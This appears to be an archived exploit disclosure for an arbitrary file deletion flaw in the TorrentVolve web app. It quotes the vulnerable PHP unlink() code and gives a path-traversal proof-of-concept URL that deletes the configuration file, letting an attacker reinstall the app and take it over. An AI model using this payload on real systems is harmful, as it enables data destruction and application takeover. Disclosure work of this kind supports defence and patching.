---------------------------------------------------------------------------------------------------- Name : Torrent Volve Site : http://sourceforge.net/projects/torrentvolve/ Down : http://sourceforge.net/project/showfiles.php?group_id=179905&package_id=207933&release_id=476030 ---------------------------------------------------------------------------------------------------- Found By : br0ly Made in : Brasil Contact : br0ly[dot]Code[at]gmail[dot]com ---------------------------------------------------------------------------------------------------- Description: Bug : Delete Arbitrary file. Look this in: archive.php; Lines 194 - 199 if(isset($_GET['deleteTorrent'])) { //delete Torrent from file system unlink($userDir . '/' . $_GET['deleteTorrent']); echo ' <div class="divStatus">' . $_GET['deleteTorrent'] . ' deleted.</div>' . "\n"; } Then after login we can delete files, if you delete the configuration file you can install the script again. ---------------------------------------------------------------------------------------------------- P0c: http://localhost/Scripts/torrentvolve/archive.php?deleteTorrent=../../../config/configuration.xml To install again go to: http://localhost/Scripts/torrentvolve/ OBS: need register_globals=on; ---------------------------------------------------------------------------------------------------- # milw0rm.com [2009-06-11]
Related Exploits
Trying to match CVEs (1): CVE-2009-2101Trying to match OSVDBs (1): 55174
Other Possible E-DB Search Terms: TorrentVolve 1.4, TorrentVolve
Date | D | V | Title | Author | No matches |
---|